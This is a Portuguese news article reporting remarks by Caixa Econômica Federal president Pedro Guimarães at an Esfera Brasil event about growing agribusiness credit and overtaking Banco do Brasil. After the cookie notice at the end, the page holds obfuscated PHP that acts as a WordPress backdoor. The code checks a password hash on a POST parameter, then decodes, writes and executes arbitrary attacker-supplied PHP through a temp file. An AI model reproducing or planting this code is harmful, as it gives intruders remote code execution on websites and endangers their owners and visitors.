“Caixa crescerá 100 bilhões de reais no agro e passará o Banco do Brasil em dois anos”, afirma Pedro Guimarães em encontro do Esfera Brasil

Em encontro promovido pelo Esfera Brasil, think tank que reúne empresários, empreendedores e a classe produtiva, na noite desta quarta (30), em São Paulo, o presidente da Caixa Econômica Federal, Pedro Guimarães, afirmou que em dois anos o banco estatal terá um crescimento de 100 bilhões de reais nas linhas de crédito do agro e passará o Banco do Brasil no ranking de maiores instituições financeiras do país. 

“Crescemos 20 vezes em um ano no agro e daqui a dois anos vamos passar o Banco do Brasil. O pessoal do Banco do Brasil vai ficar bravo, mas a Caixa hoje é um banco muito sensível para o Brasil. É um banco que já foi quebrado e teve um aporte de capital que gerou até a saída de um presidente”, disse ele no encontro que também contou com a presença de Daniella Marques, secretária especial do Ministério da Economia, e que teve mediação do empresário João Camargo.

Segundo ele, a carteira de crédito da Caixa, que hoje é de 900 bilhões de reais, chegará a 1 trilhão de reais neste ano. Guimarães também disse que a Caixa está abrindo trezentas agências pelo país e reduzindo juros, “enquanto todo mundo, corretamente, está fechando quinhentas”. “Como o ministro Paulo Guedes fala, a Caixa hoje tem um poder e um tamanho que nunca teve.”

O executivo afirmou que a Caixa é “‘imprivatizável’ (sic) pelos próximos cem anos”. “Quem é que vai executar esse tanto de política pública? Quem iria fazer o auxílio emergencial? Agora vamos pagar o FGTS de 42 milhões de pessoas em dois meses.”

A Esfera Brasil é uma organização criada para fomentar o pensamento e o diálogo sobre o Brasil e um think tank que reúne empresários, empreendedores e a classe produtiva.

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}